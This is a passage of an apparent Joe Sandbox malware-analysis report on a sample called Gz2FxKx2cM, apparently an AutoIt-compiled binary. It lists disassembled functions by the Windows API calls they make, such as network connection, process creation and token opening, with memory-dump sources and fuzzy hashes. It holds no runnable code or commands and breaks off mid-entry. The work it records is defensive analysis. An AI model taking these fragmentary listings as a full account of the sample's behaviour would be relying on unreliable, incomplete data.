                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: dd4fca5c29d2015bcb4e02655ca82bb4aede466a5b219bc2381c676b5a23fb02
                                          • Instruction ID: d830cf6003ffd303c28aded76edfdf484ed809920fa03a88e72e55b884fc4eec
                                          • Opcode Fuzzy Hash: dd4fca5c29d2015bcb4e02655ca82bb4aede466a5b219bc2381c676b5a23fb02
                                          • Instruction Fuzzy Hash: 2A113672A042146FDB04B7B4BC4AFBEB7AC9FC1320F644125F105572C3EE20584697A1
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009717A3
                                            • Part of subcall function 0097182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0097184C
                                            • Part of subcall function 0097182D: InternetCloseHandle.WININET(00000000), ref: 009718E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: c3e48cb5985c6920389980d32b29639ed93f1ff72eede7649703d0aa04a8040a
                                          • Instruction ID: 1ff2fbd66482991fb2a17fd10f38bd5f1e123aba62eb17132bc11a46ee803acb
                                          • Opcode Fuzzy Hash: c3e48cb5985c6920389980d32b29639ed93f1ff72eede7649703d0aa04a8040a
                                          • Instruction Fuzzy Hash: BA21F333214601BFEB169F64CC01FBABBADFF88710F10842EFA1996650DB71D810A7A1
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,0098FAC0), ref: 00963A64
                                          • GetLastError.KERNEL32 ref: 00963A73
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00963A82
                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0098FAC0), ref: 00963ADF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                          • String ID:
                                          • API String ID: 2267087916-0
                                          • Opcode ID: 07408049165096b67f0aff23a9c6c02fec643adfb5666c96abbd4d162f2c8903
                                          • Instruction ID: b6dd00e0801be391b9b5b762cde765df08345a45db55c680653f0ded21b4c066
                                          • Opcode Fuzzy Hash: 07408049165096b67f0aff23a9c6c02fec643adfb5666c96abbd4d162f2c8903
                                          • Instruction Fuzzy Hash: 6321A3345082019FC700EF68C89196BB7E8EE55368F149A2DF4E9C72E1D731DE46DB42
                                          APIs
                                            • Part of subcall function 0095F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0095DCD3,?,?,?,0095EAC6,00000000,000000EF,00000119,?,?), ref: 0095F0CB
                                            • Part of subcall function 0095F0BC: lstrcpyW.KERNEL32(00000000,?,?,0095DCD3,?,?,?,0095EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0095F0F1
                                            • Part of subcall function 0095F0BC: lstrcmpiW.KERNEL32(00000000,?,0095DCD3,?,?,?,0095EAC6,00000000,000000EF,00000119,?,?), ref: 0095F122
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0095EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0095DCEC
                                          • lstrcpyW.KERNEL32(00000000,?,?,0095EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0095DD12
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0095EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0095DD46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: e4c5dad78d3659996cf9169c18d416a0baa03b1e3812f59b17780977a46de8ba
                                          • Instruction ID: d392e4732a7fb335fd1d80ac9b3cbdb8daea4c1e090c2d6efb76a9be528ba8d3
                                          • Opcode Fuzzy Hash: e4c5dad78d3659996cf9169c18d416a0baa03b1e3812f59b17780977a46de8ba
                                          • Instruction Fuzzy Hash: 5A11BE3A201305EFCB25EF75D845A7A77B8FF85360B40902AE806CB2A0EB719854D7A1
                                          APIs
                                          • _free.LIBCMT ref: 00935101
                                            • Part of subcall function 0092571C: __FF_MSGBANNER.LIBCMT ref: 00925733
                                            • Part of subcall function 0092571C: __NMSG_WRITE.LIBCMT ref: 0092573A
                                            • Part of subcall function 0092571C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000000,?,?,?,00920DD3,?), ref: 0092575F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 24830c0257c83480e727f97dceae6d04777de711355329130b6fb4ea9b8c484f
                                          • Instruction ID: 16c5b616bc9f262b94b858f65e303f81fd5c0fb63e2e561fbee2368812294528
                                          • Opcode Fuzzy Hash: 24830c0257c83480e727f97dceae6d04777de711355329130b6fb4ea9b8c484f
                                          • Instruction Fuzzy Hash: 2E11C6B290DA25AFCF313FB4BC45B5E379C9F583A1F12492AF90496254DE34C9409B90
                                          APIs
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00967896,?,?,00000000), ref: 00905A2C
                                            • Part of subcall function 00905A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00967896,?,?,00000000,?,?), ref: 00905A50
                                          • gethostbyname.WSOCK32(?,?,?), ref: 00976399
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009763A4
                                          • _memmove.LIBCMT ref: 009763D1
                                          • inet_ntoa.WSOCK32(?), ref: 009763DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 66be3b788155631fc490ff5d2f90caeee6f967b133b4b614e5fcc6fd88c249cc
                                          • Instruction ID: 458ceb819a1f4e7929e5632c14699f37f5b3e895d87765923457b4bdfe7ddc19
                                          • Opcode Fuzzy Hash: 66be3b788155631fc490ff5d2f90caeee6f967b133b4b614e5fcc6fd88c249cc
                                          • Instruction Fuzzy Hash: 77113072600109AFCF04FBA4DD56EEEB7B9AF84310B548065F506A72A2DB31AE14DB61
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00958B61
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00958B73
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00958B89
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00958BA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 47e9946d5c795c8a9f303cfa8601b3141b8038784091156841f9431d1bbf4f50
                                          • Instruction ID: f942296d95eab385d7dbdc601a78f81aa7ff8c7cc4a43d08f0dc07e1c287fdc2
                                          • Opcode Fuzzy Hash: 47e9946d5c795c8a9f303cfa8601b3141b8038784091156841f9431d1bbf4f50
                                          • Instruction Fuzzy Hash: 0C112E79901218FFDB11DF95CC85FAEBB78FB48710F2041A5E900B7250DA716E15DB94
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 009012D8
                                          • GetClientRect.USER32(?,?), ref: 0093B5FB
                                          • GetCursorPos.USER32(?), ref: 0093B605
                                          • ScreenToClient.USER32(?,?), ref: 0093B610
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: 600a827e197ec14d93c34b554be029ebdfcca3f3c250dd45971ab60563189083
                                          • Instruction ID: 2ad6fa45784c1969fba501c62ac0b7d649806a8fc090f75e0c7701d37df3e093
                                          • Opcode Fuzzy Hash: 600a827e197ec14d93c34b554be029ebdfcca3f3c250dd45971ab60563189083
                                          • Instruction Fuzzy Hash: 64113635A10119EFCB10EFA8D899AFE77B8EB45300F400856FA11E7280D730BA919BA5
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0095FCED,?,00960D40,?,00008000), ref: 0096115F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0095FCED,?,00960D40,?,00008000), ref: 00961184
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0095FCED,?,00960D40,?,00008000), ref: 0096118E
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,0095FCED,?,00960D40,?,00008000), ref: 009611C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: 23b6e24fd558a65cc562feb650a00c9d18376451792bd5099bfe4a6a8ac47ee7
                                          • Instruction ID: 61094f8d55d155a0b435e258107e8953cb2ec551e5617d36e3aa6944420d52e8
                                          • Opcode Fuzzy Hash: 23b6e24fd558a65cc562feb650a00c9d18376451792bd5099bfe4a6a8ac47ee7
                                          • Instruction Fuzzy Hash: 85118E31C0852DDBCF00DFA5D888AEEBB78FF0A711F064456EA41F2240CB349550DB91
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0095D84D
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0095D864
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0095D879
                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0095D897
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          • Opcode ID: 159a3733207b22a0e4e87b5273ca700524828cbf5bebee869b295ac2cb15fa7c
                                          • Instruction ID: d5c346b7237a290d2e501891c1dabf6ba49b8a4e719454b3d55128289d36f566
                                          • Opcode Fuzzy Hash: 159a3733207b22a0e4e87b5273ca700524828cbf5bebee869b295ac2cb15fa7c
                                          • Instruction Fuzzy Hash: 15115E75606304DBE330CF52EC0CF92BBBCEB00B01F108969AA16D6160D7B4E549ABA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 0af3a3763e3ef55ea615e531df0b4f1cfdaf9fc27dad33250e61e0dd8e97f550
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 49014BB244814ABBCF2A5EC4CC42CEE7F66BB18354F588415FA5858031D236C9B1AF91
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0098B2E4
                                          • ScreenToClient.USER32(?,?), ref: 0098B2FC
                                          • ScreenToClient.USER32(?,?), ref: 0098B320
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0098B33B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: e7d83d1aeab846462830409e6ec73e70f2723c4676ee175db85b50db6c9b5fc8
                                          • Instruction ID: ae2064caf69b29ed55c75bf7c549a4bd7744f96c47e19ed1f06a64d13e27d581
                                          • Opcode Fuzzy Hash: e7d83d1aeab846462830409e6ec73e70f2723c4676ee175db85b50db6c9b5fc8
                                          • Instruction Fuzzy Hash: 7A116475D0420DAFDB01DF99C4449EEBBB9FB18310F104166E915E2320D731AA519F50
                                          APIs
                                          • _memset.LIBCMT ref: 0098B644
                                          • _memset.LIBCMT ref: 0098B653
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009C6F20,009C6F64), ref: 0098B682
                                          • CloseHandle.KERNEL32 ref: 0098B694
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          • Opcode ID: d88e7abc86db37b2b4fe569e6457848c7ca119dd2859033f257e8a6dd1e388b0
                                          • Instruction ID: bad24db874190d3b9650fc4a1556524d6fc6df7fa90685293a44ecef5fb5ada5
                                          • Opcode Fuzzy Hash: d88e7abc86db37b2b4fe569e6457848c7ca119dd2859033f257e8a6dd1e388b0
                                          • Instruction Fuzzy Hash: C3F082B29543107BE3102761BC06FBB3E9CEB08395F404029FA08E9192D7718C0097B9
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 00966BE6
                                            • Part of subcall function 009676C4: _memset.LIBCMT ref: 009676F9
                                          • _memmove.LIBCMT ref: 00966C09
                                          • _memset.LIBCMT ref: 00966C16
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00966C26
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: d7b9d6884564f817a72d03031fa63292d0dd43ac1d8e96a2685604e3a574f678
                                          • Instruction ID: 7e26c15adc46d14cf49d89950597b46f4836fc8763ece6b1f5f17ae9c2981004
                                          • Opcode Fuzzy Hash: d7b9d6884564f817a72d03031fa63292d0dd43ac1d8e96a2685604e3a574f678
                                          • Instruction Fuzzy Hash: C1F05E3A204110BBCF016F95EC85B8ABB29EF85320F088061FE085E26BD735E811DBB4
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00902231
                                          • SetTextColor.GDI32(?,000000FF), ref: 0090223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00902250
                                          • GetStockObject.GDI32(00000005), ref: 00902258
                                          • GetWindowDC.USER32(?,00000000), ref: 0093BE83
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0093BE90
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0093BEA9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0093BEC2
                                          • GetPixel.GDI32(00000000,?,?), ref: 0093BEE2
                                          • ReleaseDC.USER32(?,00000000), ref: 0093BEED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 967632ffdbf2f263345b93ce0eb01c13f08d781400a4a01cc8c399c2f1b8779c
                                          • Instruction ID: 3ad05bf4714286904537fb7895efc8f9d0131dfceb701e2f51201fb566f27fb3
                                          • Opcode Fuzzy Hash: 967632ffdbf2f263345b93ce0eb01c13f08d781400a4a01cc8c399c2f1b8779c
                                          • Instruction Fuzzy Hash: 6DE03932118244EADF215FA8EC4D7E83B14EB05336F109366FA69480E187714990EF12
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 0095871B
                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,009582E6), ref: 00958722
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009582E6), ref: 0095872F
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,009582E6), ref: 00958736
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: d22783ef21a4dd2206e67e53e672686b1593a17a9bb5119483403d90b4df9836
                                          • Instruction ID: 46dcfbcf2340b0219088d190517eafa42f3ee972748a8bb5d8920f44a3b0117c
                                          • Opcode Fuzzy Hash: d22783ef21a4dd2206e67e53e672686b1593a17a9bb5119483403d90b4df9836
                                          • Instruction Fuzzy Hash: C8E0CD366293119FD7205FB15D0CB5B3BACEF547D2F24483CF645E9050DA348449E750
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0095B4BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container
                                          • API String ID: 3565006973-3941886329
                                          • Opcode ID: c3e45bfff352b253258b1ac3cfa451537a1ce12b32df1fc70202f2c4afa2189a
                                          • Instruction ID: cd494fe7030afb21ac83a6c2e5c7393ac4739b26dbca505d67324dcc1fc7ba10
                                          • Opcode Fuzzy Hash: c3e45bfff352b253258b1ac3cfa451537a1ce12b32df1fc70202f2c4afa2189a
                                          • Instruction Fuzzy Hash: DC913970600601AFDB24DF65C884B6ABBE9FF49711F20856DFD4ACB2A1EB70E845CB50
                                          APIs
                                            • Part of subcall function 0091FC86: _wcscpy.LIBCMT ref: 0091FCA9
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • __wcsnicmp.LIBCMT ref: 0096B02D
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0096B0F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00912968
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00912981
                                          Strings
                                          Similarity
